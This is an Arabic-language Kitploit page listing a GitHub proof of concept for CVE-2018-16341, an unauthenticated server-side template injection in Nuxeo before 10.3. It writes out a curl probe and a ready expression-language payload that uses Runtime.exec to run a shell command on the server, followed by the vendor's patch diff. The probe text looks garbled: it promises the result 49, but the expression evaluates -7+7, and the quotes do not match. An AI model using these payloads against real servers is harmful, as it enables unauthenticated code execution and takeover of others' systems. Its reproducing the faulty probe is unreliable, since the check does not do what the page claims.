Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-16341 — CVE-2018-16341 - تنفيذ تعليمات برمجية عن بُعد في Nuxeo بدون مصادقة باستخدام حقن القوالب من جانب الخادم | Kitploit
أدوات/GitHubGitHub/mpgn/cve-2018-16341
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - تنفيذ تعليمات برمجية عن بُعد في Nuxeo بدون مصادقة باستخدام حقن القوالب من جانب الخادم

عرض المستودع
2412منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-16341

تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في Nuxeo < 10.3 باستخدام SSTI - CVE-2018-16341

image

تحليل مفصّل (ليس بالإنجليزية):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

استشارة أمنية:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

ملاحظة: إصدار Nuxeo 9.x لم يعد مدعومًا من قِبل Nuxeo، ولكن تم توفير تصحيح سريع للإصدار 9.x. من جهتي، كان الإصدار 9.10 معرضًا للخطر.


الثغرة

يستغل إثبات المفهوم هذا (PoC) حقن القوالب من جهة الخادم (SSTI) لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) الموجود في الملف NuxeoUnknownResource.java

  • للتحقق مما إذا كان Nuxeo معرضًا للخطر، فقط أرسل هذه الحمولة وتحقق من الرقم 49:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • احصل على RCE باستخدام هذه الحمولة:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

الإصلاح

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
تنزيل الأداة